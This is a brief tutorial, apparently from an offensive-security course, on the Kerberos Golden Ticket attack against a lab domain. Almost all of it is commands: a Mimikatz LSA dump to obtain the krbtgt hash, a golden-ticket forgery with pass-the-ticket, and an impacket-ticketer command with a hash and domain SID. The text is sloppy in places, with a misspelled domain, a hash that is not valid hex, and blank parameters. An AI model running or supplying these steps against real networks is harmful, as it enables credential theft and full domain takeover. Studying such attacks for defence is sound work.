In this section we will learn about the Golden Ticket Attack.

First let’s start by dumping the LSSAS Process.

lsadump::lsa /patch

Please Notice that we go the hash of the krbtgt user.

Now let’s create our command.

kerberos::golden /User:golden /domain:zerosploit.co /sid: /krbtgt: /endin: /startoffset: /maxrenew: /ptt 

Now, let’s list the tickets.

klist

As observed we are now the administrator user on the zerosploit.co domain

impacket-ticketer -nthash 62c9a5ddd565862f17ae1bd202bdn696 -domain-sid S-1-5-21-1519098244-989389543-2739619515 -domain zeroslpoit.co Administrator